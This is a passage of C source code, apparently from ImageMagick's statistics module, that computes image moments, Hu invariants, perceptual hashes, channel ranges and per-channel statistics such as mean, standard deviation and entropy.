M12[BlueChannel]+=(x-centroid[BlueChannel].x)*(y-
centroid[BlueChannel].y)*(y-centroid[BlueChannel].y)*QuantumScale*
pixel.blue;
M22[BlueChannel]+=(x-centroid[BlueChannel].x)*(x-
centroid[BlueChannel].x)*(y-centroid[BlueChannel].y)*(y-
centroid[BlueChannel].y)*QuantumScale*pixel.blue;
M30[BlueChannel]+=(x-centroid[BlueChannel].x)*(x-
centroid[BlueChannel].x)*(x-centroid[BlueChannel].x)*QuantumScale*
pixel.blue;
M03[BlueChannel]+=(y-centroid[BlueChannel].y)*(y-
centroid[BlueChannel].y)*(y-centroid[BlueChannel].y)*QuantumScale*
pixel.blue;
if (image->matte != MagickFalse)
{
M11[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(y-
centroid[OpacityChannel].y)*QuantumScale*pixel.opacity;
M20[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(x-
centroid[OpacityChannel].x)*QuantumScale*pixel.opacity;
M02[OpacityChannel]+=(y-centroid[OpacityChannel].y)*(y-
centroid[OpacityChannel].y)*QuantumScale*pixel.opacity;
M21[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(x-
centroid[OpacityChannel].x)*(y-centroid[OpacityChannel].y)*
QuantumScale*pixel.opacity;
M12[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(y-
centroid[OpacityChannel].y)*(y-centroid[OpacityChannel].y)*
QuantumScale*pixel.opacity;
M22[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(x-
centroid[OpacityChannel].x)*(y-centroid[OpacityChannel].y)*(y-
centroid[OpacityChannel].y)*QuantumScale*pixel.opacity;
M30[OpacityChannel]+=(x-centroid[OpacityChannel].x)*(x-
centroid[OpacityChannel].x)*(x-centroid[OpacityChannel].x)*
QuantumScale*pixel.opacity;
M03[OpacityChannel]+=(y-centroid[OpacityChannel].y)*(y-
centroid[OpacityChannel].y)*(y-centroid[OpacityChannel].y)*
QuantumScale*pixel.opacity;
}
if (image->colorspace == CMYKColorspace)
{
M11[IndexChannel]+=(x-centroid[IndexChannel].x)*(y-
centroid[IndexChannel].y)*QuantumScale*pixel.index;
M20[IndexChannel]+=(x-centroid[IndexChannel].x)*(x-
centroid[IndexChannel].x)*QuantumScale*pixel.index;
M02[IndexChannel]+=(y-centroid[IndexChannel].y)*(y-
centroid[IndexChannel].y)*QuantumScale*pixel.index;
M21[IndexChannel]+=(x-centroid[IndexChannel].x)*(x-
centroid[IndexChannel].x)*(y-centroid[IndexChannel].y)*
QuantumScale*pixel.index;
M12[IndexChannel]+=(x-centroid[IndexChannel].x)*(y-
centroid[IndexChannel].y)*(y-centroid[IndexChannel].y)*
QuantumScale*pixel.index;
M22[IndexChannel]+=(x-centroid[IndexChannel].x)*(x-
centroid[IndexChannel].x)*(y-centroid[IndexChannel].y)*(y-
centroid[IndexChannel].y)*QuantumScale*pixel.index;
M30[IndexChannel]+=(x-centroid[IndexChannel].x)*(x-
centroid[IndexChannel].x)*(x-centroid[IndexChannel].x)*
QuantumScale*pixel.index;
M03[IndexChannel]+=(y-centroid[IndexChannel].y)*(y-
centroid[IndexChannel].y)*(y-centroid[IndexChannel].y)*
QuantumScale*pixel.index;
}
p++;
}
}
channels=3;
M00[CompositeChannels]+=(M00[RedChannel]+M00[GreenChannel]+M00[BlueChannel]);
M01[CompositeChannels]+=(M01[RedChannel]+M01[GreenChannel]+M01[BlueChannel]);
M02[CompositeChannels]+=(M02[RedChannel]+M02[GreenChannel]+M02[BlueChannel]);
M03[CompositeChannels]+=(M03[RedChannel]+M03[GreenChannel]+M03[BlueChannel]);
M10[CompositeChannels]+=(M10[RedChannel]+M10[GreenChannel]+M10[BlueChannel]);
M11[CompositeChannels]+=(M11[RedChannel]+M11[GreenChannel]+M11[BlueChannel]);
M12[CompositeChannels]+=(M12[RedChannel]+M12[GreenChannel]+M12[BlueChannel]);
M20[CompositeChannels]+=(M20[RedChannel]+M20[GreenChannel]+M20[BlueChannel]);
M21[CompositeChannels]+=(M21[RedChannel]+M21[GreenChannel]+M21[BlueChannel]);
M22[CompositeChannels]+=(M22[RedChannel]+M22[GreenChannel]+M22[BlueChannel]);
M30[CompositeChannels]+=(M30[RedChannel]+M30[GreenChannel]+M30[BlueChannel]);
if (image->matte != MagickFalse)
{
channels+=1;
M00[CompositeChannels]+=M00[OpacityChannel];
M01[CompositeChannels]+=M01[OpacityChannel];
M02[CompositeChannels]+=M02[OpacityChannel];
M03[CompositeChannels]+=M03[OpacityChannel];
M10[CompositeChannels]+=M10[OpacityChannel];
M11[CompositeChannels]+=M11[OpacityChannel];
M12[CompositeChannels]+=M12[OpacityChannel];
M20[CompositeChannels]+=M20[OpacityChannel];
M21[CompositeChannels]+=M21[OpacityChannel];
M22[CompositeChannels]+=M22[OpacityChannel];
M30[CompositeChannels]+=M30[OpacityChannel];
}
if (image->colorspace == CMYKColorspace)
{
channels+=1;
M00[CompositeChannels]+=M00[IndexChannel];
M01[CompositeChannels]+=M01[IndexChannel];
M02[CompositeChannels]+=M02[IndexChannel];
M03[CompositeChannels]+=M03[IndexChannel];
M10[CompositeChannels]+=M10[IndexChannel];
M11[CompositeChannels]+=M11[IndexChannel];
M12[CompositeChannels]+=M12[IndexChannel];
M20[CompositeChannels]+=M20[IndexChannel];
M21[CompositeChannels]+=M21[IndexChannel];
M22[CompositeChannels]+=M22[IndexChannel];
M30[CompositeChannels]+=M30[IndexChannel];
}
M00[CompositeChannels]/=(double) channels;
M01[CompositeChannels]/=(double) channels;
M02[CompositeChannels]/=(double) channels;
M03[CompositeChannels]/=(double) channels;
M10[CompositeChannels]/=(double) channels;
M11[CompositeChannels]/=(double) channels;
M12[CompositeChannels]/=(double) channels;
M20[CompositeChannels]/=(double) channels;
M21[CompositeChannels]/=(double) channels;
M22[CompositeChannels]/=(double) channels;
M30[CompositeChannels]/=(double) channels;
for (channel=0; channel <= CompositeChannels; channel++)
{
/*
Compute elliptical angle, major and minor axes, eccentricity, & intensity.
*/
channel_moments[channel].centroid=centroid[channel];
channel_moments[channel].ellipse_axis.x=sqrt((2.0/M00[channel])*
((M20[channel]+M02[channel])+sqrt(4.0*M11[channel]*M11[channel]+
(M20[channel]-M02[channel])*(M20[channel]-M02[channel]))));
channel_moments[channel].ellipse_axis.y=sqrt((2.0/M00[channel])*
((M20[channel]+M02[channel])-sqrt(4.0*M11[channel]*M11[channel]+
(M20[channel]-M02[channel])*(M20[channel]-M02[channel]))));
channel_moments[channel].ellipse_angle=RadiansToDegrees(0.5*atan(2.0*
M11[channel]/(M20[channel]-M02[channel]+MagickEpsilon)));
if (fabs(M11[channel]) < MagickEpsilon)
{
if (fabs(M20[channel]-M02[channel]) < MagickEpsilon)
channel_moments[channel].ellipse_angle+=0.0;
else
if ((M20[channel]-M02[channel]) < 0.0)
channel_moments[channel].ellipse_angle+=90.0;
else
channel_moments[channel].ellipse_angle+=0.0;
}
else
if (M11[channel] < 0.0)
{
if (fabs(M20[channel]-M02[channel]) < MagickEpsilon)
channel_moments[channel].ellipse_angle+=0.0;
else
if ((M20[channel]-M02[channel]) < 0.0)
channel_moments[channel].ellipse_angle+=90.0;
else
channel_moments[channel].ellipse_angle+=180.0;
}
else
{
if (fabs(M20[channel]-M02[channel]) < MagickEpsilon)
channel_moments[channel].ellipse_angle+=0.0;
else
if ((M20[channel]-M02[channel]) < 0.0)
channel_moments[channel].ellipse_angle+=90.0;
else
channel_moments[channel].ellipse_angle+=0.0;
}
channel_moments[channel].ellipse_eccentricity=sqrt(1.0-(
channel_moments[channel].ellipse_axis.y/
(channel_moments[channel].ellipse_axis.x+MagickEpsilon)));
channel_moments[channel].ellipse_intensity=M00[channel]/
(MagickPI*channel_moments[channel].ellipse_axis.x*
channel_moments[channel].ellipse_axis.y+MagickEpsilon);
}
for (channel=0; channel <= CompositeChannels; channel++)
{
/*
Normalize image moments.
*/
M10[channel]=0.0;
M01[channel]=0.0;
M11[channel]/=pow(M00[channel],1.0+(1.0+1.0)/2.0);
M20[channel]/=pow(M00[channel],1.0+(2.0+0.0)/2.0);
M02[channel]/=pow(M00[channel],1.0+(0.0+2.0)/2.0);
M21[channel]/=pow(M00[channel],1.0+(2.0+1.0)/2.0);
M12[channel]/=pow(M00[channel],1.0+(1.0+2.0)/2.0);
M22[channel]/=pow(M00[channel],1.0+(2.0+2.0)/2.0);
M30[channel]/=pow(M00[channel],1.0+(3.0+0.0)/2.0);
M03[channel]/=pow(M00[channel],1.0+(0.0+3.0)/2.0);
M00[channel]=1.0;
}
for (channel=0; channel <= CompositeChannels; channel++)
{
/*
Compute Hu invariant moments.
*/
channel_moments[channel].I[0]=M20[channel]+M02[channel];
channel_moments[channel].I[1]=(M20[channel]-M02[channel])*
(M20[channel]-M02[channel])+4.0*M11[channel]*M11[channel];
channel_moments[channel].I[2]=(M30[channel]-3.0*M12[channel])*
(M30[channel]-3.0*M12[channel])+(3.0*M21[channel]-M03[channel])*
(3.0*M21[channel]-M03[channel]);
channel_moments[channel].I[3]=(M30[channel]+M12[channel])*
(M30[channel]+M12[channel])+(M21[channel]+M03[channel])*
(M21[channel]+M03[channel]);
channel_moments[channel].I[4]=(M30[channel]-3.0*M12[channel])*
(M30[channel]+M12[channel])*((M30[channel]+M12[channel])*
(M30[channel]+M12[channel])-3.0*(M21[channel]+M03[channel])*
(M21[channel]+M03[channel]))+(3.0*M21[channel]-M03[channel])*
(M21[channel]+M03[channel])*(3.0*(M30[channel]+M12[channel])*
(M30[channel]+M12[channel])-(M21[channel]+M03[channel])*
(M21[channel]+M03[channel]));
channel_moments[channel].I[5]=(M20[channel]-M02[channel])*
((M30[channel]+M12[channel])*(M30[channel]+M12[channel])-
(M21[channel]+M03[channel])*(M21[channel]+M03[channel]))+
4.0*M11[channel]*(M30[channel]+M12[channel])*(M21[channel]+M03[channel]);
channel_moments[channel].I[6]=(3.0*M21[channel]-M03[channel])*
(M30[channel]+M12[channel])*((M30[channel]+M12[channel])*
(M30[channel]+M12[channel])-3.0*(M21[channel]+M03[channel])*
(M21[channel]+M03[channel]))-(M30[channel]-3*M12[channel])*
(M21[channel]+M03[channel])*(3.0*(M30[channel]+M12[channel])*
(M30[channel]+M12[channel])-(M21[channel]+M03[channel])*
(M21[channel]+M03[channel]));
channel_moments[channel].I[7]=M11[channel]*((M30[channel]+M12[channel])*
(M30[channel]+M12[channel])-(M03[channel]+M21[channel])*
(M03[channel]+M21[channel]))-(M20[channel]-M02[channel])*
(M30[channel]+M12[channel])*(M03[channel]+M21[channel]);
}
if (y < (ssize_t) image->rows)
channel_moments=(ChannelMoments *) RelinquishMagickMemory(channel_moments);
return(channel_moments);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l P e r c e p t u a l H a s h %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelPerceptualHash() returns the perceptual hash of one or more
% image channels.
%
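% The returned buffer is indexed by channel; P[] holds the sRGB moments and
% Q[] the HCLp moments.  Free it with RelinquishMagickMemory().  For example
% (an illustrative sketch; the variable names are assumptions):
%
% ChannelPerceptualHash *channel_phash;
%
% channel_phash=GetImageChannelPerceptualHash(image,exception);
% if (channel_phash != (ChannelPerceptualHash *) NULL)
% channel_phash=(ChannelPerceptualHash *) RelinquishMagickMemory(
% channel_phash);
%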
% The format of the GetImageChannelPerceptualHash method is:
%
% ChannelPerceptualHash *GetImageChannelPerceptualHash(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
static inline double MagickLog10(const double x)
{
#define Log10Epsilon (1.0e-11)
if (fabs(x) < Log10Epsilon)
return(log10(Log10Epsilon));
return(log10(fabs(x)));
}
MagickExport ChannelPerceptualHash *GetImageChannelPerceptualHash(
const Image *image,ExceptionInfo *exception)
{
ChannelMoments
*moments;
ChannelPerceptualHash
*perceptual_hash;
Image
*hash_image;
MagickBooleanType
status;
register ssize_t
i;
ssize_t
channel;
/*
Blur then transform to sRGB colorspace.
*/
hash_image=BlurImage(image,0.0,1.0,exception);
if (hash_image == (Image *) NULL)
return((ChannelPerceptualHash *) NULL);
hash_image->depth=8;
status=TransformImageColorspace(hash_image,sRGBColorspace);
if (status == MagickFalse)
{
hash_image=DestroyImage(hash_image);
return((ChannelPerceptualHash *) NULL);
}
moments=GetImageChannelMoments(hash_image,exception);
hash_image=DestroyImage(hash_image);
if (moments == (ChannelMoments *) NULL)
return((ChannelPerceptualHash *) NULL);
perceptual_hash=(ChannelPerceptualHash *) AcquireQuantumMemory(
CompositeChannels+1UL,sizeof(*perceptual_hash));
if (perceptual_hash == (ChannelPerceptualHash *) NULL)
return((ChannelPerceptualHash *) NULL);
for (channel=0; channel <= CompositeChannels; channel++)
for (i=0; i < MaximumNumberOfImageMoments; i++)
perceptual_hash[channel].P[i]=(-MagickLog10(moments[channel].I[i]));
moments=(ChannelMoments *) RelinquishMagickMemory(moments);
/*
Blur then transform to HCLp colorspace.
*/
hash_image=BlurImage(image,0.0,1.0,exception);
if (hash_image == (Image *) NULL)
{
perceptual_hash=(ChannelPerceptualHash *) RelinquishMagickMemory(
perceptual_hash);
return((ChannelPerceptualHash *) NULL);
}
hash_image->depth=8;
status=TransformImageColorspace(hash_image,HCLpColorspace);
if (status == MagickFalse)
{
hash_image=DestroyImage(hash_image);
perceptual_hash=(ChannelPerceptualHash *) RelinquishMagickMemory(
perceptual_hash);
return((ChannelPerceptualHash *) NULL);
}
moments=GetImageChannelMoments(hash_image,exception);
hash_image=DestroyImage(hash_image);
if (moments == (ChannelMoments *) NULL)
{
perceptual_hash=(ChannelPerceptualHash *) RelinquishMagickMemory(
perceptual_hash);
return((ChannelPerceptualHash *) NULL);
}
for (channel=0; channel <= CompositeChannels; channel++)
for (i=0; i < MaximumNumberOfImageMoments; i++)
perceptual_hash[channel].Q[i]=(-MagickLog10(moments[channel].I[i]));
moments=(ChannelMoments *) RelinquishMagickMemory(moments);
return(perceptual_hash);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l R a n g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelRange() returns the range of one or more image channels.
%
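% For example (an illustrative sketch; `image' and `exception' are assumed
% to be valid):
%
% double maxima, minima;
%
% (void) GetImageChannelRange(image,RedChannel,&minima,&maxima,exception);
%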
% The format of the GetImageChannelRange method is:
%
% MagickBooleanType GetImageChannelRange(const Image *image,
% const ChannelType channel,double *minima,double *maxima,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o minima: the minimum value in the channel.
%
% o maxima: the maximum value in the channel.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType GetImageRange(const Image *image,
double *minima,double *maxima,ExceptionInfo *exception)
{
return(GetImageChannelRange(image,CompositeChannels,minima,maxima,exception));
}
MagickExport MagickBooleanType GetImageChannelRange(const Image *image,
const ChannelType channel,double *minima,double *maxima,
ExceptionInfo *exception)
{
MagickPixelPacket
pixel;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
*maxima=(-MagickMaximumValue);
*minima=MagickMaximumValue;
GetMagickPixelPacket(image,&pixel);
for (y=0; y < (ssize_t) image->rows; y++)
{
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register ssize_t
x;
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
break;
indexes=GetVirtualIndexQueue(image);
for (x=0; x < (ssize_t) image->columns; x++)
{
SetMagickPixelPacket(image,p,indexes+x,&pixel);
if ((channel & RedChannel) != 0)
{
if (pixel.red < *minima)
*minima=(double) pixel.red;
if (pixel.red > *maxima)
*maxima=(double) pixel.red;
}
if ((channel & GreenChannel) != 0)
{
if (pixel.green < *minima)
*minima=(double) pixel.green;
if (pixel.green > *maxima)
*maxima=(double) pixel.green;
}
if ((channel & BlueChannel) != 0)
{
if (pixel.blue < *minima)
*minima=(double) pixel.blue;
if (pixel.blue > *maxima)
*maxima=(double) pixel.blue;
}
if (((channel & OpacityChannel) != 0) && (image->matte != MagickFalse))
{
if ((QuantumRange-pixel.opacity) < *minima)
*minima=(double) (QuantumRange-pixel.opacity);
if ((QuantumRange-pixel.opacity) > *maxima)
*maxima=(double) (QuantumRange-pixel.opacity);
}
if (((channel & IndexChannel) != 0) &&
(image->colorspace == CMYKColorspace))
{
if ((double) pixel.index < *minima)
*minima=(double) pixel.index;
if ((double) pixel.index > *maxima)
*maxima=(double) pixel.index;
}
p++;
}
}
return(y == (ssize_t) image->rows ? MagickTrue : MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l S t a t i s t i c s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelStatistics() returns statistics for each channel in the
% image. The statistics include the channel depth, its minima, maxima, mean,
% standard deviation, kurtosis and skewness. You can access the red channel
% mean, for example, like this:
%
% channel_statistics=GetImageChannelStatistics(image,exception);
% red_mean=channel_statistics[RedChannel].mean;
%
% Use RelinquishMagickMemory() to free the statistics buffer.
%
% The format of the GetImageChannelStatistics method is:
%
% ChannelStatistics *GetImageChannelStatistics(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport ChannelStatistics *GetImageChannelStatistics(const Image *image,
ExceptionInfo *exception)
{
ChannelStatistics
*channel_statistics;
double
area,
standard_deviation;
MagickPixelPacket
number_bins,
*histogram;
QuantumAny
range;
register ssize_t
i;
size_t
channels,
depth,
length;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
length=CompositeChannels+1UL;
channel_statistics=(ChannelStatistics *) AcquireQuantumMemory(length,
sizeof(*channel_statistics));
histogram=(MagickPixelPacket *) AcquireQuantumMemory(MaxMap+1U,
sizeof(*histogram));
if ((channel_statistics == (ChannelStatistics *) NULL) ||
(histogram == (MagickPixelPacket *) NULL))
{
if (histogram != (MagickPixelPacket *) NULL)
histogram=(MagickPixelPacket *) RelinquishMagickMemory(histogram);
if (channel_statistics != (ChannelStatistics *) NULL)
channel_statistics=(ChannelStatistics *) RelinquishMagickMemory(
channel_statistics);
return(channel_statistics);
}
(void) memset(channel_statistics,0,length*
sizeof(*channel_statistics));
for (i=0; i <= (ssize_t) CompositeChannels; i++)
{
channel_statistics[i].depth=1;
channel_statistics[i].maxima=(-MagickMaximumValue);
channel_statistics[i].minima=MagickMaximumValue;
}
(void) memset(histogram,0,(MaxMap+1U)*sizeof(*histogram));
(void) memset(&number_bins,0,sizeof(number_bins));
for (y=0; y < (ssize_t) image->rows; y++)
{
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register ssize_t
x;
/*
Compute pixel statistics.
*/
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
break;
indexes=GetVirtualIndexQueue(image);
for (x=0; x < (ssize_t) image->columns; )
{
if (channel_statistics[RedChannel].depth != MAGICKCORE_QUANTUM_DEPTH)
{
depth=channel_statistics[RedChannel].depth;
range=GetQuantumRange(depth);
if (IsPixelAtDepth(GetPixelRed(p),range) == MagickFalse)
{
channel_statistics[RedChannel].depth++;
continue;
}
}
if (channel_statistics[GreenChannel].depth != MAGICKCORE_QUANTUM_DEPTH)
{
depth=channel_statistics[GreenChannel].depth;
range=GetQuantumRange(depth);
if (IsPixelAtDepth(GetPixelGreen(p),range) == MagickFalse)
{
channel_statistics[GreenChannel].depth++;
continue;
}
}
if (channel_statistics[BlueChannel].depth != MAGICKCORE_QUANTUM_DEPTH)
{
depth=channel_statistics[BlueChannel].depth;
range=GetQuantumRange(depth);
if (IsPixelAtDepth(GetPixelBlue(p),range) == MagickFalse)
{
channel_statistics[BlueChannel].depth++;
continue;
}
}
if (image->matte != MagickFalse)
{
if (channel_statistics[OpacityChannel].depth != MAGICKCORE_QUANTUM_DEPTH)
{
depth=channel_statistics[OpacityChannel].depth;
range=GetQuantumRange(depth);
if (IsPixelAtDepth(GetPixelAlpha(p),range) == MagickFalse)
{
channel_statistics[OpacityChannel].depth++;
continue;
}
}
}
if (image->colorspace == CMYKColorspace)
{
if (channel_statistics[BlackChannel].depth != MAGICKCORE_QUANTUM_DEPTH)
{
depth=channel_statistics[BlackChannel].depth;
range=GetQuantumRange(depth);
if (IsPixelAtDepth(GetPixelIndex(indexes+x),range) == MagickFalse)
{
channel_statistics[BlackChannel].depth++;
continue;
}
}
}
if ((double) GetPixelRed(p) < channel_statistics[RedChannel].minima)
channel_statistics[RedChannel].minima=(double) GetPixelRed(p);
if ((double) GetPixelRed(p) > channel_statistics[RedChannel].maxima)
channel_statistics[RedChannel].maxima=(double) GetPixelRed(p);
channel_statistics[RedChannel].sum+=GetPixelRed(p);
channel_statistics[RedChannel].sum_squared+=(double) GetPixelRed(p)*
GetPixelRed(p);
channel_statistics[RedChannel].sum_cubed+=(double)
GetPixelRed(p)*GetPixelRed(p)*GetPixelRed(p);
channel_statistics[RedChannel].sum_fourth_power+=(double)
GetPixelRed(p)*GetPixelRed(p)*GetPixelRed(p)*GetPixelRed(p);
if ((double) GetPixelGreen(p) < channel_statistics[GreenChannel].minima)
channel_statistics[GreenChannel].minima=(double) GetPixelGreen(p);
if ((double) GetPixelGreen(p) > channel_statistics[GreenChannel].maxima)
channel_statistics[GreenChannel].maxima=(double) GetPixelGreen(p);
channel_statistics[GreenChannel].sum+=GetPixelGreen(p);
channel_statistics[GreenChannel].sum_squared+=(double) GetPixelGreen(p)*
GetPixelGreen(p);
channel_statistics[GreenChannel].sum_cubed+=(double) GetPixelGreen(p)*
GetPixelGreen(p)*GetPixelGreen(p);
channel_statistics[GreenChannel].sum_fourth_power+=(double)
GetPixelGreen(p)*GetPixelGreen(p)*GetPixelGreen(p)*GetPixelGreen(p);
if ((double) GetPixelBlue(p) < channel_statistics[BlueChannel].minima)
channel_statistics[BlueChannel].minima=(double) GetPixelBlue(p);
if ((double) GetPixelBlue(p) > channel_statistics[BlueChannel].maxima)
channel_statistics[BlueChannel].maxima=(double) GetPixelBlue(p);
channel_statistics[BlueChannel].sum+=GetPixelBlue(p);
channel_statistics[BlueChannel].sum_squared+=(double) GetPixelBlue(p)*
GetPixelBlue(p);
channel_statistics[BlueChannel].sum_cubed+=(double) GetPixelBlue(p)*
GetPixelBlue(p)*GetPixelBlue(p);
channel_statistics[BlueChannel].sum_fourth_power+=(double)
GetPixelBlue(p)*GetPixelBlue(p)*GetPixelBlue(p)*GetPixelBlue(p);
histogram[ScaleQuantumToMap(GetPixelRed(p))].red++;
histogram[ScaleQuantumToMap(GetPixelGreen(p))].green++;
histogram[ScaleQuantumToMap(GetPixelBlue(p))].blue++;
if (image->matte != MagickFalse)
{
if ((double) GetPixelAlpha(p) < channel_statistics[OpacityChannel].minima)
channel_statistics[OpacityChannel].minima=(double) GetPixelAlpha(p);
if ((double) GetPixelAlpha(p) > channel_statistics[OpacityChannel].maxima)
channel_statistics[OpacityChannel].maxima=(double) GetPixelAlpha(p);
channel_statistics[OpacityChannel].sum+=GetPixelAlpha(p);
channel_statistics[OpacityChannel].sum_squared+=(double)
GetPixelAlpha(p)*GetPixelAlpha(p);
channel_statistics[OpacityChannel].sum_cubed+=(double)
GetPixelAlpha(p)*GetPixelAlpha(p)*GetPixelAlpha(p);
channel_statistics[OpacityChannel].sum_fourth_power+=(double)
GetPixelAlpha(p)*GetPixelAlpha(p)*GetPixelAlpha(p)*GetPixelAlpha(p);
histogram[ScaleQuantumToMap(GetPixelAlpha(p))].opacity++;
}
if (image->colorspace == CMYKColorspace)
{
if ((double) GetPixelIndex(indexes+x) < channel_statistics[BlackChannel].minima)
channel_statistics[BlackChannel].minima=(double)
GetPixelIndex(indexes+x);
if ((double) GetPixelIndex(indexes+x) > channel_statistics[BlackChannel].maxima)
channel_statistics[BlackChannel].maxima=(double)
GetPixelIndex(indexes+x);
channel_statistics[BlackChannel].sum+=GetPixelIndex(indexes+x);
channel_statistics[BlackChannel].sum_squared+=(double)
GetPixelIndex(indexes+x)*GetPixelIndex(indexes+x);
channel_statistics[BlackChannel].sum_cubed+=(double)
GetPixelIndex(indexes+x)*GetPixelIndex(indexes+x)*
GetPixelIndex(indexes+x);
channel_statistics[BlackChannel].sum_fourth_power+=(double)
GetPixelIndex(indexes+x)*GetPixelIndex(indexes+x)*
GetPixelIndex(indexes+x)*GetPixelIndex(indexes+x);
histogram[ScaleQuantumToMap(GetPixelIndex(indexes+x))].index++;
}
x++;
p++;
}
}
for (i=0; i < (ssize_t) CompositeChannels; i++)
{
double
area,
mean,
standard_deviation;
/*
Normalize pixel statistics.
*/
area=PerceptibleReciprocal((double) image->columns*image->rows);
mean=channel_statistics[i].sum*area;
channel_statistics[i].sum=mean;
channel_statistics[i].sum_squared*=area;
channel_statistics[i].sum_cubed*=area;
channel_statistics[i].sum_fourth_power*=area;
channel_statistics[i].mean=mean;
channel_statistics[i].variance=channel_statistics[i].sum_squared;
standard_deviation=sqrt(channel_statistics[i].variance-(mean*mean));
area=PerceptibleReciprocal((double) image->columns*image->rows-1.0)*
((double) image->columns*image->rows);
standard_deviation=sqrt(area*standard_deviation*standard_deviation);
channel_statistics[i].standard_deviation=standard_deviation;
}
for (i=0; i < (ssize_t) (MaxMap+1U); i++)
{
if (histogram[i].red > 0.0)
number_bins.red++;
if (histogram[i].green > 0.0)
number_bins.green++;
if (histogram[i].blue > 0.0)
number_bins.blue++;
if ((image->matte != MagickFalse) && (histogram[i].opacity > 0.0))
number_bins.opacity++;
if ((image->colorspace == CMYKColorspace) && (histogram[i].index > 0.0))
number_bins.index++;
}
area=PerceptibleReciprocal((double) image->columns*image->rows);
for (i=0; i < (ssize_t) (MaxMap+1U); i++)
{
/*
Compute pixel entropy.
*/
histogram[i].red*=area;
channel_statistics[RedChannel].entropy+=-histogram[i].red*
MagickLog10(histogram[i].red)*
PerceptibleReciprocal(MagickLog10((double) number_bins.red));
histogram[i].green*=area;
channel_statistics[GreenChannel].entropy+=-histogram[i].green*
MagickLog10(histogram[i].green)*
PerceptibleReciprocal(MagickLog10((double) number_bins.green));
histogram[i].blue*=area;
channel_statistics[BlueChannel].entropy+=-histogram[i].blue*
MagickLog10(histogram[i].blue)*
PerceptibleReciprocal(MagickLog10((double) number_bins.blue));
if (image->matte != MagickFalse)
{
histogram[i].opacity*=area;
channel_statistics[OpacityChannel].entropy+=-histogram[i].opacity*
MagickLog10(histogram[i].opacity)*
PerceptibleReciprocal(MagickLog10((double) number_bins.opacity));
}
if (image->colorspace == CMYKColorspace)
{
histogram[i].index*=area;
channel_statistics[IndexChannel].entropy+=-histogram[i].index*
MagickLog10(histogram[i].index)*
PerceptibleReciprocal(MagickLog10((double) number_bins.index));
}
}
/*
Compute overall statistics.
*/
for (i=0; i < (ssize_t) CompositeChannels; i++)
{
channel_statistics[CompositeChannels].depth=(size_t) EvaluateMax((double)
channel_statistics[CompositeChannels].depth,(double)
channel_statistics[i].depth);
channel_statistics[CompositeChannels].minima=MagickMin(
channel_statistics[CompositeChannels].minima,
channel_statistics[i].minima);
channel_statistics[CompositeChannels].maxima=EvaluateMax(
channel_statistics[CompositeChannels].maxima,
channel_statistics[i].maxima);
channel_statistics[CompositeChannels].sum+=channel_statistics[i].sum;
channel_statistics[CompositeChannels].sum_squared+=
channel_statistics[i].sum_squared;
channel_statistics[CompositeChannels].sum_cubed+=
channel_statistics[i].sum_cubed;
channel_statistics[CompositeChannels].sum_fourth_power+=
channel_statistics[i].sum_fourth_power;
channel_statistics[CompositeChannels].mean+=channel_statistics[i].mean;
channel_statistics[CompositeChannels].variance+=
channel_statistics[i].variance-channel_statistics[i].mean*
channel_statistics[i].mean;
standard_deviation=sqrt(channel_statistics[i].variance-
(channel_statistics[i].mean*channel_statistics[i].mean));
area=PerceptibleReciprocal((double) image->columns*image->rows-1.0)*
((double) image->columns*image->rows);
standard_deviation=sqrt(area*standard_deviation*standard_deviation);
channel_statistics[CompositeChannels].standard_deviation=standard_deviation;
channel_statistics[CompositeChannels].entropy+=
channel_statistics[i].entropy;
}
channels=3;
if (image->matte != MagickFalse)
channels++;
if (image->colorspace == CMYKColorspace)
channels++;
channel_statistics[CompositeChannels].sum/=channels;
channel_statistics[CompositeChannels].sum_squared/=channels;
channel_statistics[CompositeChannels].sum_cubed/=channels;
channel_statistics[CompositeChannels].sum_fourth_power/=channels;
channel_statistics[CompositeChannels].mean/=channels;
channel_statistics[CompositeChannels].kurtosis/=channels;
channel_statistics[CompositeChannels].skewness/=channels;
channel_statistics[CompositeChannels].entropy/=channels;
i=CompositeChannels;
